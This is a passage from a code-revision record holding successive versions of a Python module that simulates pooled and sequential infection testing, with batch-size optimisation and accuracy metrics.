result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-4": "<mask token>\n\n\n@jit(parallel=True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat=1,\n seq=True):\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n if seq == True:\n consum = 0\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i, 1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, consum\n else:\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)\n )\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat / 2 else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * repeat\n\n\n@njit(parallel=True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype=int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i, :]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i, :]) < typeI_error else 0\n test_result[i, 0] = subject_array[i, 0]\n test_result[i, 1] = temp\n return test_result, len(subject_array) * num, len(subject_array) * num\n\n\ndef infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1 - p\n r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **\n batch_size + typeII_error * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\"\n q = 1 - p\n r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **\n batch_size + (1 - typeII_error) * (1 - q ** batch_size))\n return p * r / (1 - q ** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,\n n_initial_guess=2):\n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1 - prevalence_rate\n func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *\n np.log(q)) ** (-1 / 2)\n n_solution = fsolve(func, n_initial_guess)\n return float(n_solution)\n\n\ndef one_batch_test_int_solver(prevalence_rate, typeII_error, typeI_error,\n batch_limit, n_initial_guess=2):\n \"\"\"\n A function gives (int) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n n_initial_guess(float): the initial guess \n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess:\n batch_limit (int): the upper limit of batch size\n\n Output:\n (int): the optimal batch size\n \"\"\"\n sol_float = one_batch_test_solver(prevalence_rate, typeII_error,\n typeI_error, n_initial_guess)\n floor, ceil = np.floor(sol_float), np.ceil(sol_float)\n func = lambda batch_size: 1 / batch_size + 1 - typeII_error - (1 -\n typeII_error - typeI_error) * (1 - prevalence_rate) ** batch_size\n if func(floor) < func(ceil):\n temp = int(floor)\n else:\n temp = int(ceil)\n if temp <= batch_limit:\n return temp\n else:\n return int(batch_limit)\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array) / batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in temp_batch[:, 1]:\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n return neg_batch, pos_batch, test_consum\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n return tn / (tn + fp)\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\ndef test_result(data, seq_test, **kwargs):\n \"\"\"\n a helper function provides convenient results for a given test method with its **kwargs\n\n Input:\n data (array or list of arrays)\n seq_test (test_method object): could be seq_test, matrix_test and other test_method objects\n Output:\n result (DataFrame): a dataframe contains important evaluation metrics for the test method \n \"\"\"\n if isinstance(data, list) == False:\n pred, consum, ind_con = seq_test(data, **kwargs)\n result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':\n recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score\n (data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],\n pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),\n 'test_consum': consum, 'ind_consum': ind_con, 'batch_consum': \n consum - ind_con}\n return result\n else:\n length = len(data)\n acc = np.zeros(length)\n sens = np.zeros(length)\n spec = np.zeros(length)\n ppv = np.zeros(length)\n npv = np.zeros(length)\n test_consum = np.zeros(length)\n ind_consum = np.zeros(length)\n batch_consum = np.zeros(length)\n for i in range(length):\n pred, consum, ind_con = seq_test(data[i], **kwargs)\n acc[i] = np.mean(pred[:, 1] == data[i][:, 1])\n sens[i] = recall_score(data[i][:, 1], pred[:, 1])\n spec[i] = specificity_score(data[i][:, 1], pred[:, 1])\n ppv[i] = precision_score(data[i][:, 1], pred[:, 1])\n npv[i] = npv_score(data[i][:, 1], pred[:, 1])\n test_consum[i] = consum\n ind_consum[i] = ind_con\n batch_consum[i] = consum - ind_con\n result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':\n npv, 'test_consum': test_consum, 'ind_consum': ind_consum,\n 'batch_consum': batch_consum}\n return pd.DataFrame(result)\n\n\ndef matrix_test(subject_array, side_length, typeII_error, typeI_error,\n sq_repeat=1, ind_repeat=1, seq=True):\n \"\"\"\n This function provides the matrix testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n side_length (int): the side length of the matrix testing\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n sq_repeat (int): the number of parallel testing for the column/row batch testing\n ind_repeat (int): the number of potential individual testing for the positive crossings\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n matrix_test_num = len(subject_array) // side_length ** 2\n matrix_test_array = subject_array[0:matrix_test_num * side_length ** 2, :]\n ind_test_array = subject_array[matrix_test_num * side_length ** 2:, :]\n ind_idx = []\n for temp_batch in np.array_split(matrix_test_array, matrix_test_num):\n temp_batch = temp_batch.reshape(side_length, side_length, 2)\n temp_row = []\n temp_col = []\n random_num_row = np.random.uniform(0, 1, sq_repeat)\n random_num_col = np.random.uniform(0, 1, sq_repeat)\n for i in range(side_length):\n if 1 in temp_batch[i, :, 1]:\n if max(random_num_row) > typeII_error:\n temp_row.append(temp_batch[i, :, 0])\n elif min(random_num_row) < typeI_error:\n temp_row.append(temp_batch[i, :, 0])\n if 1 in temp_batch[:, i, 1]:\n if max(random_num_col) > typeII_error:\n temp_col.append(temp_batch[:, i, 0])\n elif min(random_num_col) < typeI_error:\n temp_col.append(temp_batch[:, i, 0])\n ind_idx.append(np.intersect1d(temp_row, temp_col))\n ind_idx = np.concatenate(ind_idx)\n ind_idx = ind_idx.astype('int')\n if len(ind_idx) == 0:\n neg_array = matrix_test_array\n else:\n mask = np.zeros(subject_array.shape[0], dtype=bool)\n mask[ind_idx] = True\n mask[matrix_test_num * side_length ** 2:] = True\n ind_test_array = subject_array[mask, :]\n neg_array = subject_array[~mask, :]\n neg_array[:, 1] = 0\n ind_test, ind_con = conventional_test(ind_test_array, typeII_error,\n typeI_error, repeat=ind_repeat, seq=seq)\n batch_test_num = matrix_test_num * 2 * side_length * sq_repeat\n result = np.concatenate((neg_array, ind_test))\n result = result[result[:, 0].argsort()]\n return result, batch_test_num + ind_con, ind_con\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error,\n typeI_error, parallel_num, ind_repeat, seq):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(\n subject_array) / batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in temp_batch[:, 1]:\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch,\n typeII_error, typeI_error, repeat=ind_repeat, seq=seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, batch_consum + individual_con, individual_con\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-5": "import numpy as np\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_score, recall_score, f1_score\nfrom scipy.optimize import fsolve\nimport numba\nfrom numba import njit,jit\n#\n@jit(parallel = True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat = 1,\nseq = True):\n\n\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n\n\n # Sequential Testing\n if seq == True:\n consum = 0\n \n test_result = np.zeros(subject_array.shape, dtype = int)\n \n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i,1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n \n\n test_result[i,0] = subject_array[i,0]\n test_result[i,1] = temp\n \n return test_result, consum\n \n # Simultanous Testing \n else: \n test_result = np.zeros(subject_array.shape, dtype = int)\n \n\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat/2 else 0\n test_result[i,0] = subject_array[i,0]\n test_result[i,1] = temp\n \n return test_result, len(subject_array)*repeat\n\n\n@njit(parallel = True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype = int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i,:]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i,:]) < typeI_error else 0\n\n test_result[i,0] = subject_array[i,0]\n test_result[i,1] = temp\n\n return test_result,len(subject_array)*num,len(subject_array)*num\n\n\ndef infection_rate_on_negative_batch(p,batch_size,typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the negative batch\n\n\n\n \"\"\"\n q = 1-p\n r = typeII_error * (1 - q ** batch_size)/((1 - typeI_error) * q ** batch_size + typeII_error *(1 - q**batch_size))\n return p*r/(1-q**batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\" \n\n q = 1-p\n r = (1 - typeII_error) * (1 - q ** batch_size)/(typeI_error * q ** batch_size + (1 - typeII_error) * (1 - q **batch_size))\n return p*r/(1 - q** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate,typeII_error, typeI_error,n_initial_guess = 2):\n \n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1- prevalence_rate # To consistent with the notation of our document\n func = lambda n : n*q**(n/2) - (-(1-typeII_error - typeI_error)*np.log(q))**(-1/2)\n # print(func(n_initial_guess))\n n_solution = fsolve(func, n_initial_guess)\n \n return float(n_solution)\n\ndef one_batch_test_int_solver(prevalence_rate,typeII_error, typeI_error,batch_limit,n_initial_guess = 2):\n \"\"\"\n A function gives (int) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n n_initial_guess(float): the initial guess \n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess:\n batch_limit (int): the upper limit of batch size\n\n Output:\n (int): the optimal batch size\n \"\"\"\n\n \n sol_float = one_batch_test_solver(prevalence_rate,typeII_error, typeI_error, n_initial_guess)\n floor, ceil = np.floor(sol_float), np.ceil(sol_float)\n func = lambda batch_size: 1/batch_size + 1 - typeII_error -(1 - typeII_error - typeI_error)*(1-prevalence_rate)**batch_size\n if func(floor) < func(ceil):\n temp = int(floor)\n else:\n temp = int(ceil)\n if temp <= batch_limit:\n return temp\n else:\n return int(batch_limit)\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array)/batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in (temp_batch[:,1]):\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n else:\n if random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])\n return (neg_batch, pos_batch, test_consum)\n\ndef helpfunction(subject_array, p, batch_size ,typeII_error, typeI_error, batch_limit):\n \n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate 